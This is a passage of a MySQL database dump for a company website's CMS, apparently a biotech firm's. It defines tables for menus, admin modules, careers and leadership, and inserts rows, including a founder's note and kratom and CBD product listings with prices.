  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

/*Data for the table `tbl_happenings_sections` */

insert  into `tbl_happenings_sections`(`id`,`section_name`,`slug`,`section_type`,`display_order`,`seo_title`,`seo_keywords`,`seo_description`,`status`,`is_deleted`,`createdon`,`modifiedon`) values (1,'News','news','H','1','','','','1','0','2021-08-24 13:16:42','2021-08-24 13:16:42');

/*Table structure for table `tbl_history` */

DROP TABLE IF EXISTS `tbl_history`;

CREATE TABLE `tbl_history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) DEFAULT NULL,
  `slug` varchar(150) NOT NULL,
  `history_image` varchar(150) DEFAULT NULL,
  `description` text,
  `is_display_home` enum('Y','N') DEFAULT 'N',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `display_order` int(11) DEFAULT NULL,
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `category` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_history` */

/*Table structure for table `tbl_impact` */

DROP TABLE IF EXISTS `tbl_impact`;

CREATE TABLE `tbl_impact` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `impact_title` varchar(250) NOT NULL,
  `impact_url` varchar(250) NOT NULL,
  `impact_stats` varchar(50) NOT NULL,
  `impact_image` varchar(100) DEFAULT NULL,
  `impact_short_description` tinytext,
  `impact_description` text,
  `display_order` int(11) DEFAULT NULL,
  `is_display_home` enum('0','1') DEFAULT '0',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `impact_name` varchar(150) DEFAULT NULL,
  `business_id` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `tbl_impact` */

/*Table structure for table `tbl_job_application_form` */

DROP TABLE IF EXISTS `tbl_job_application_form`;

CREATE TABLE `tbl_job_application_form` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(250) DEFAULT NULL,
  `email` varchar(250) NOT NULL,
  `phone` varchar(100) NOT NULL,
  `message` text NOT NULL,
  `created` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modified` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `status` enum('0','1') NOT NULL,
  `business` varchar(250) DEFAULT NULL,
  `resume` varchar(250) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `tbl_job_application_form` */

/*Table structure for table `tbl_leadership` */

DROP TABLE IF EXISTS `tbl_leadership`;

CREATE TABLE `tbl_leadership` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(150) NOT NULL,
  `profile_image` varchar(150) DEFAULT NULL,
  `designation` varchar(200) DEFAULT NULL,
  `description` text,
  `status` enum('0','1') NOT NULL DEFAULT '1',
  `is_deleted` enum('0','1') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `business_id` int(11) DEFAULT NULL,
  `slug` varchar(200) DEFAULT NULL,
  `display_order` int(11) DEFAULT NULL,
  `display_label` varchar(150) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;

/*Data for the table `tbl_leadership` */

insert  into `tbl_leadership`(`id`,`name`,`profile_image`,`designation`,`description`,`status`,`is_deleted`,`createdon`,`modifiedon`,`business_id`,`slug`,`display_order`,`display_label`) values (1,'A note from the Founder','founder.png','Founder','<p>Maxwell Biotech aspires to be a leader in the integration of farming and technology. It recommends using hydroponic technology to ensure consistency in the retention of medicinal properties and tissue culture to eliminate genetic variation and organisms in plants. Maxwell Biotech and Sharda University will research the aspects that influence the herbal/cannabis crop\'s growth and come up with fresh and novel ways to improve it. <strong>- Mr. P.K. Gupta</strong></p>','1','0','2021-09-16 09:07:42','2021-09-16 10:02:44',NULL,'a-note-from-the-founder',1,'A note from the Founder');

/*Table structure for table `tbl_main_menu` */

DROP TABLE IF EXISTS `tbl_main_menu`;

CREATE TABLE `tbl_main_menu` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `menu_name` varchar(100) DEFAULT NULL,
  `display_name` varchar(100) DEFAULT NULL,
  `menu_url` varchar(100) NOT NULL,
  `display_order` char(5) DEFAULT NULL,
  `status` enum('1','0') DEFAULT '1',
  `display_position` tinyint(2) NOT NULL DEFAULT '0',
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime DEFAULT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `seo_title` varchar(150) DEFAULT NULL,
  `seo_keywords` text,
  `seo_description` text,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8;

/*Data for the table `tbl_main_menu` */

insert  into `tbl_main_menu`(`id`,`menu_name`,`display_name`,`menu_url`,`display_order`,`status`,`display_position`,`is_deleted`,`createdon`,`modifiedon`,`seo_title`,`seo_keywords`,`seo_description`) values (1,'Home','Home','home','1','1',2,'0','2021-08-23 02:59:34','2021-08-23 14:59:34','','',''),(2,'About','About','about','2','1',2,'0','2021-08-23 02:59:55','2021-08-23 14:59:55','','',''),(3,'Product','Product','product','3','0',0,'0','2021-08-23 03:00:19','2021-08-23 15:00:19','','',''),(4,'Knowledge Centre','Knowledge Centre','knowledge-centre','4','1',2,'0','2021-08-23 03:00:51','2021-08-23 15:00:51','','',''),(5,'Contact Us','Contact Us','contact','6','1',2,'0','2021-08-23 03:01:25','2021-08-23 15:01:25','','',''),(6,'Company Background','Company Background','company-background','1','1',1,'0','2021-08-23 03:05:27','2021-08-23 15:05:27','','',''),(7,'Career','Career','career','2','1',1,'0','2021-08-23 03:07:15','2021-08-23 15:07:15','','',''),(8,'Team','Team','team','4','1',1,'0','2021-08-23 03:07:42','2021-08-23 15:07:42','','',''),(9,'FAQ\'s','FAQ\'s','faq','5','1',1,'0','2021-08-23 03:08:12','2021-08-23 15:08:12','','',''),(10,'Disclaimer','Disclaimer','disclaimer','6','1',3,'0','2021-08-23 03:09:28','2021-08-23 15:09:28','','',''),(11,'Privacy Policy','Privacy Policy','privacypolicy','7','1',3,'0','2021-08-23 03:10:04','2021-08-23 15:10:04','','',''),(12,'Terms & Conditions','Terms & Conditions','termsofuse','8','1',3,'0','2021-08-23 03:10:40','2021-08-23 15:10:40','','','');

/*Table structure for table `tbl_manage_files` */

DROP TABLE IF EXISTS `tbl_manage_files`;

CREATE TABLE `tbl_manage_files` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(250) NOT NULL,
  `description` text NOT NULL,
  `download_file_name` varchar(250) DEFAULT NULL,
  `status` enum('0','1') NOT NULL DEFAULT '1',
  `is_deleted` enum('0','1') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `display_order` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;

/*Data for the table `tbl_manage_files` */

insert  into `tbl_manage_files`(`id`,`title`,`description`,`download_file_name`,`status`,`is_deleted`,`createdon`,`modifiedon`,`display_order`) values (1,'test','','about-banner.jpg','1','0','2021-09-16 10:43:22','2021-09-16 10:43:22',1);

/*Table structure for table `tbl_milestones` */

DROP TABLE IF EXISTS `tbl_milestones`;

CREATE TABLE `tbl_milestones` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(250) NOT NULL,
  `description` text NOT NULL,
  `status` enum('0','1') NOT NULL DEFAULT '1',
  `is_deleted` enum('0','1') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `display_order` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `tbl_milestones` */

/*Table structure for table `tbl_module_list` */

DROP TABLE IF EXISTS `tbl_module_list`;

CREATE TABLE `tbl_module_list` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `module_name` varchar(220) DEFAULT NULL,
  `custom` varchar(200) DEFAULT NULL,
  `display_name` varchar(250) DEFAULT NULL,
  `display_icon` varchar(250) DEFAULT NULL,
  `display_order` tinyint(4) DEFAULT NULL,
  `status` tinyint(4) NOT NULL DEFAULT '1',
  `is_deleted` tinyint(4) NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=34 DEFAULT CHARSET=latin1;

/*Data for the table `tbl_module_list` */

insert  into `tbl_module_list`(`id`,`module_name`,`custom`,`display_name`,`display_icon`,`display_order`,`status`,`is_deleted`,`createdon`,`modifiedon`) values (1,'advanced_settings',NULL,'Advanced Settings','fa fa-cog',2,1,0,'2020-11-07 11:38:17','2020-10-27 09:07:25'),(2,'manageteam',NULL,'Manage Team','fa fa-users',3,1,0,'2020-11-07 11:38:26','2020-10-29 09:32:24'),(3,'custom_page',NULL,'Custom Page','fa fa-edit',4,1,0,'2020-11-07 11:38:34','2020-11-02 04:42:06'),(4,'settings',NULL,'Settings','fa fa-cog',5,1,0,'2020-11-07 11:38:44','2020-11-02 07:30:26'),(5,'managemenu',NULL,'Manage Menu','fa fa-bars',6,1,0,'2020-11-07 11:38:54','2020-11-04 06:46:18'),(6,'managebanners',NULL,'Manage Banners','fa fa-image',7,1,0,'2020-11-07 11:39:04','2020-11-04 15:30:49'),(7,'manageawards',NULL,'Manage FAQ\'s','fa fa-trophy',8,1,0,'2021-08-25 15:22:19','2020-11-05 15:49:53'),(10,'managehappenings',NULL,'Manage Article','fa fa-globe',11,1,0,'2021-08-25 15:21:44','2020-11-07 11:05:43'),(12,'home',NULL,'Dashboard','fa fa-home',1,1,0,'2020-11-07 11:33:44','2020-11-07 11:33:44'),(13,'adminusers',NULL,'Manage Users','fa fa-user',12,1,0,'2020-11-07 11:40:40','2020-11-07 11:35:36'),(14,'managerole',NULL,'Manage Role','fa fa-bars',13,1,0,'2020-11-07 11:40:59','2020-11-07 11:36:40'),(15,'managemodule',NULL,'Manage Module','fa fa-bars',14,1,0,'2020-11-07 11:41:12','2020-11-07 11:37:15'),(17,'downloadcenter',NULL,'Download Center','fa fa-download',16,1,0,'2020-11-09 09:41:18','2020-11-09 09:41:18'),(21,'manageeventsgallery',NULL,'Manage Events Gallery','fa fa-globe',19,1,0,'2020-11-10 07:05:08','2020-11-10 07:05:08'),(22,'managealbums',NULL,'Manage Albums','fa fa-globe',20,1,0,'2020-11-10 07:25:35','2020-11-10 07:25:35'),(24,'managevideo',NULL,'Manage Videos','fa fa-globe',22,1,0,'2020-11-10 09:18:05','2020-11-10 09:18:05'),(26,'managecareer',NULL,'Manage Career','fa fa-globe',25,1,0,'2020-11-11 08:34:15','2020-11-11 08:34:15'),(27,'manageleadership',NULL,'Manage Leadership ','fa fa-user',26,1,0,'2020-11-12 11:05:22','2020-11-12 11:05:22'),(28,'managehistory',NULL,'Manage History','fa fa-history',26,1,0,'2020-11-17 10:48:26','2020-11-17 10:48:26'),(31,'manageaboutus',NULL,'Manage About Us','fa fa-globe',29,1,0,'2020-11-18 05:09:30','2020-11-18 05:09:30'),(33,'pageseo',NULL,'Custom SEO','fa fa-university',5,1,0,'2021-09-06 10:45:05','2021-09-06 10:45:05');

/*Table structure for table `tbl_ngo` */

DROP TABLE IF EXISTS `tbl_ngo`;

CREATE TABLE `tbl_ngo` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) DEFAULT NULL,
  `slug` varchar(150) NOT NULL,
  `ngo_image` varchar(150) DEFAULT NULL,
  `description` text,
  `is_display_home` enum('Y','N') DEFAULT 'N',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `display_order` int(11) DEFAULT NULL,
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `category` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_ngo` */

/*Table structure for table `tbl_offices` */

DROP TABLE IF EXISTS `tbl_offices`;

CREATE TABLE `tbl_offices` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(200) NOT NULL,
  `slug` varchar(200) NOT NULL,
  `category` varchar(250) DEFAULT NULL,
  `description` text,
  `office_image` varchar(100) DEFAULT NULL,
  `is_display_home` enum('N','Y') NOT NULL DEFAULT 'N',
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `address` varchar(250) DEFAULT NULL,
  `short_description` text,
  `country` varchar(100) DEFAULT NULL,
  `state` varchar(100) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `phone` varchar(100) DEFAULT NULL,
  `email` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_offices` */

/*Table structure for table `tbl_offices_category` */

DROP TABLE IF EXISTS `tbl_offices_category`;

CREATE TABLE `tbl_offices_category` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `category_name` varchar(250) NOT NULL,
  `slug` varchar(100) NOT NULL,
  `display_order` varchar(10) NOT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_offices_category` */

/*Table structure for table `tbl_positions` */

DROP TABLE IF EXISTS `tbl_positions`;

CREATE TABLE `tbl_positions` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `position_title` varchar(200) NOT NULL,
  `slug` varchar(200) NOT NULL,
  `category` varchar(250) DEFAULT NULL,
  `position_description` text,
  `position_image` varchar(100) DEFAULT NULL,
  `is_display_home` enum('N','Y') NOT NULL DEFAULT 'N',
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `address` varchar(250) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `state` varchar(100) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `phone` varchar(100) DEFAULT NULL,
  `email` varchar(100) DEFAULT NULL,
  `short_description` text,
  `company_name` varchar(250) DEFAULT NULL,
  `job_description_file` varchar(250) DEFAULT NULL,
  `google_form_link` varchar(250) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_positions` */

/*Table structure for table `tbl_positions_category` */

DROP TABLE IF EXISTS `tbl_positions_category`;

CREATE TABLE `tbl_positions_category` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `category_name` varchar(250) NOT NULL,
  `slug` varchar(100) NOT NULL,
  `display_order` varchar(10) NOT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_positions_category` */

/*Table structure for table `tbl_quotes` */

DROP TABLE IF EXISTS `tbl_quotes`;

CREATE TABLE `tbl_quotes` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) DEFAULT NULL,
  `description` text,
  `is_display_home` enum('Y','N') DEFAULT 'N',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `display_order` int(11) DEFAULT NULL,
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_quotes` */

/*Table structure for table `tbl_schools` */

DROP TABLE IF EXISTS `tbl_schools`;

CREATE TABLE `tbl_schools` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `school_name` varchar(250) NOT NULL,
  `school_tagline` varchar(250) DEFAULT NULL,
  `school_url` varchar(250) NOT NULL,
  `discipline_type` varchar(200) DEFAULT NULL,
  `disciplines_ids` varchar(200) DEFAULT NULL,
  `discipline_values` varchar(200) DEFAULT '',
  `school_code` varchar(50) NOT NULL,
  `school_image` varchar(100) DEFAULT NULL,
  `overview` text,
  `about_schools` text,
  `highlights` text,
  `school_stats` text,
  `general_brochure` varchar(100) DEFAULT NULL,
  `custom` text,
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `seo_keywords` text,
  `seo_description` text,
  `seo_title` varchar(250) DEFAULT NULL,
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `tbl_schools` */

/*Table structure for table `tbl_shardastory` */

DROP TABLE IF EXISTS `tbl_shardastory`;

CREATE TABLE `tbl_shardastory` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `story_date` date DEFAULT NULL,
  `story_title` varchar(250) NOT NULL,
  `story_url` varchar(150) NOT NULL,
  `story_short_description` text,
  `story_description` text,
  `banner_type` enum('Image','Video','Youtube','Others') DEFAULT 'Image',
  `youtube_url` varchar(120) DEFAULT NULL,
  `story_image` varchar(100) DEFAULT NULL,
  `display_order` int(10) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*Data for the table `tbl_shardastory` */

/*Table structure for table `tbl_sub_menu` */

DROP TABLE IF EXISTS `tbl_sub_menu`;

CREATE TABLE `tbl_sub_menu` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `menu_id` int(11) DEFAULT NULL,
  `sub_menu_name` varchar(100) DEFAULT NULL,
  `display_name` varchar(100) DEFAULT NULL,
  `sub_menu_url` varchar(100) NOT NULL,
  `submenu_image` varchar(150) DEFAULT NULL,
  `short_description` text,
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') DEFAULT '1',
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `url_type` enum('Internal','External') DEFAULT 'Internal',
  `seo_title` varchar(250) DEFAULT NULL,
  `seo_keywords` text,
  `seo_description` text,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;

/*Data for the table `tbl_sub_menu` */

insert  into `tbl_sub_menu`(`id`,`menu_id`,`sub_menu_name`,`display_name`,`sub_menu_url`,`submenu_image`,`short_description`,`display_order`,`status`,`is_deleted`,`createdon`,`modifiedon`,`url_type`,`seo_title`,`seo_keywords`,`seo_description`) values (1,2,'Our History','Our History','about/history','',NULL,1,'0','0','2020-11-18 08:53:58','2020-11-18 08:53:58','External','','',''),(2,2,'Our Culture','Our Culture','about/culture','',NULL,2,'0','0','2020-11-18 08:54:36','2020-11-18 08:54:36','External','','',''),(3,3,'Education','Education','','',NULL,3,'0','0','2020-11-18 09:05:08','2020-11-18 09:05:08','External','','','');

/*Table structure for table `tbl_sub_sub_menu` */

DROP TABLE IF EXISTS `tbl_sub_sub_menu`;

CREATE TABLE `tbl_sub_sub_menu` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `menu_id` int(11) DEFAULT NULL,
  `sub_sub_menu_name` varchar(100) DEFAULT NULL,
  `display_name` varchar(100) DEFAULT NULL,
  `sub_sub_menu_url` varchar(100) NOT NULL,
  `subsubmenu_image` varchar(150) DEFAULT NULL,
  `sub_menu_id` char(3) DEFAULT NULL,
  `short_description` text,
  `display_order` int(11) DEFAULT NULL,
  `status` enum('1','0') DEFAULT '1',
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `url_type` enum('Internal','External') DEFAULT 'Internal',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

/*Data for the table `tbl_sub_sub_menu` */

insert  into `tbl_sub_sub_menu`(`id`,`menu_id`,`sub_sub_menu_name`,`display_name`,`sub_sub_menu_url`,`subsubmenu_image`,`sub_menu_id`,`short_description`,`display_order`,`status`,`is_deleted`,`createdon`,`modifiedon`,`url_type`) values (1,3,'Sharda University','Sharda University','sharda-university','','',NULL,1,'0','0','2020-11-18 09:06:03','2020-11-18 09:06:03','External');

/*Table structure for table `tbl_sustainability` */

DROP TABLE IF EXISTS `tbl_sustainability`;

CREATE TABLE `tbl_sustainability` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) DEFAULT NULL,
  `slug` varchar(150) NOT NULL,
  `sustainable_image` varchar(150) NOT NULL,
  `description` text,
  `is_display_home` enum('Y','N') DEFAULT 'N',
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `display_order` int(11) DEFAULT NULL,
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modifiedon` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `category` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*Data for the table `tbl_sustainability` */

/*Table structure for table `tbl_team` */

DROP TABLE IF EXISTS `tbl_team`;

CREATE TABLE `tbl_team` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(150) NOT NULL,
  `profile_image` varchar(150) DEFAULT NULL,
  `designation` varchar(200) DEFAULT NULL,
  `description` text,
  `status` enum('0','1') NOT NULL DEFAULT '1',
  `is_deleted` enum('0','1') NOT NULL DEFAULT '0',
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `modifiedon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `message` text,
  `slug` varchar(200) DEFAULT NULL,
  `display_order` int(11) DEFAULT NULL,
  `display_label` varchar(150) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=latin1;

/*Data for the table `tbl_team` */

insert  into `tbl_team`(`id`,`name`,`profile_image`,`designation`,`description`,`status`,`is_deleted`,`createdon`,`modifiedon`,`message`,`slug`,`display_order`,`display_label`) values (1,'KRATOM POWDER','14.jpg','KRATOM POWDER','<div>\"<strong>Kratom powder</strong>\" refers to the finely ground leaves of the Mitragyna speciosa tree, which is native to Southeast Asia. Kratom powder is derived from the dried leaves of the plant and is often consumed for its potential stimulating or sedating effects. It contains active compounds called alkaloids, including mitragynine and 7-hydroxymitragynine, which interact with opioid receptors in the brain. Kratom powder is typically consumed orally, either by swallowing directly or by brewing it into a tea. It is known for its wide range of potential effects, including pain relief, relaxation, increased energy, and mood enhancement. However, it is important to note that kratom is a substance of concern and its use should be approached with caution due to potential risks and varying legal status in different regions.</div>\r\n\r\n<p><strong>KRATOM POWDER:</strong></p>\r\n\r\n<ul>\r\n	<li>Mitragynine1.5%-2.5%</li>\r\n	<li>60-70 MESH 28 USD/KG</li>\r\n	<li>80-90 MESH 37 USD/KG</li>\r\n	<li>100-120 MESH 45 USD/KG</li>\r\n</ul>\r\n','1','0','2021-08-26 06:22:13','2023-07-14 13:14:26','','kratom-powder',1,'KRATOM POWDER'),(2,'KRATOM EXTRACTS','111.jpg','KRATOM EXTRACTS','<p>\"<strong>Kratom extracts</strong>\" are concentrated forms of kratom that are made by extracting the active compounds from the leaves of the Mitragyna speciosa tree. The extraction process typically involves soaking the leaves in a solvent, such as alcohol or water, to extract the alkaloids. The resulting liquid is then further processed to evaporate the solvent, leaving behind a concentrated extract. Kratom extracts are available in various forms, including tinctures, resins, and enhanced powders. Due to their higher concentration of alkaloids, kratom extracts are typically more potent than traditional kratom powder or leaf. They are often consumed in smaller quantities to achieve the desired effects, such as pain relief, relaxation, or increased energy. However, it is important to exercise caution when using kratom extracts due to their potency and potential for higher risk of side effects.</p>\r\n\r\n<h4><strong>KRATOM EXTRACTS</strong></h4>\r\n\r\n<ul>\r\n	<li>Mitragynine 9%</li>\r\n	<li>492 USD/Liter</li>\r\n</ul>\r\n','1','0','2021-09-07 06:16:28','2023-07-14 13:14:45','','kratom-extracts',2,'KRATOM EXTRACTS'),(3,'KRATOM CAPSULES','12.jpeg','KRATOM CAPSULES','<p>\"<strong>Kratom capsules</strong>\" refer to gelatin or vegetable-based capsules filled with powdered kratom. They are a convenient and popular way of consuming kratom. Kratom capsules contain measured doses of kratom powder, making it easier to control and manage the dosage. The capsules can be swallowed with water or any other beverage, similar to other oral medications. Kratom capsules provide a tasteless and odorless alternative to consuming kratom powder directly, which some individuals may find more palatable. They offer convenience and discretion, allowing users to take kratom discreetly and on-the-go. However, it is important to carefully follow dosage instructions and be aware of the potential risks and effects associated with kratom use.</p>\r\n\r\n<p><strong>KRATOM CAPSULES</strong></p>\r\n\r\n<ul>\r\n	<li>60-120 MESH Mitragynine level 1.5% -2.5%</li>\r\n</ul>\r\n\r\n<p>&nbsp;</p>\r\n','1','0','2021-09-07 06:17:11','2023-07-14 13:15:00','','kratom-capsules',3,'KRATOM CAPSULES'),(4,'KRATOM PRICES KRATOM TEABAG','13.jpg','KRATOM PRICES KRATOM TEABAG','<p>\"<strong>Kratom Teabag</strong>\" refers to a tea bag that contains kratom leaves or kratom powder. It is a convenient and popular method of preparing and consuming kratom as a beverage. The teabag is typically filled with measured doses of kratom leaves or powder, which are steeped in hot water to extract the active compounds. The tea can be brewed by simply placing the teabag in a cup of hot water and allowing it to steep for a few minutes. Kratom tea is known for its potential effects, such as relaxation, pain relief, and mood enhancement. It is often consumed for its more gradual onset and potentially smoother experience compared to other methods of kratom consumption. However, it is important to be cautious and understand the potential risks and effects associated with kratom use, even when prepared in tea form.</p>\r\n','1','0','2021-09-07 06:18:31','2023-07-14 14:45:28','','kratom-teabag',4,'KRATOM PRICES KRATOM TEABAG'),(5,'KRATOM DRINKS','16.jpeg','KRATOM DRINKS','<p>\"<strong>Kratom drinks</strong>\" refer to beverages that incorporate kratom powder or extracts as one of the ingredients. These drinks can come in various forms, such as kratom-infused teas, juices, smoothies, or mixed with other ingredients like fruit juices or energy drinks. Kratom drinks offer an alternative way of consuming kratom, providing a more palatable and enjoyable experience for some individuals who may find the taste of kratom powder less appealing. The drinks can be prepared at home or purchased from kratom vendors or specialty shops that offer kratom-infused products. It\'s important to note that the effects and potency of kratom drinks can vary depending on the dosage and the specific blend or recipe used. Caution should be exercised to ensure responsible and safe consumption.</p>\r\n\r\n<p><strong>KRATOM DRINKS:</strong></p>\r\n\r\n<ul>\r\n	<li>18 DIFFERENT FLAVOURS</li>\r\n</ul>\r\n','1','0','2021-09-07 06:19:21','2023-07-14 12:56:48','','kratom-drinks',5,'KRATOM DRINKS'),(6,'CBD Oil','prod-6.jpg','CBD Oil','<p>CBD oil is the most common form of using CBD for its therapeutic benefits. It comes from the stalks, flowers, and buds of the hemp plant. The term CBD oil is a catch-all term used to describe CBD extracts in general.</p>\r\n','1','0','2023-07-15 06:36:31','2023-07-15 06:36:31','','cbd-oil',1,'CBD Oil'),(7,'CBD Isolate','prod-4.jpg','CBD 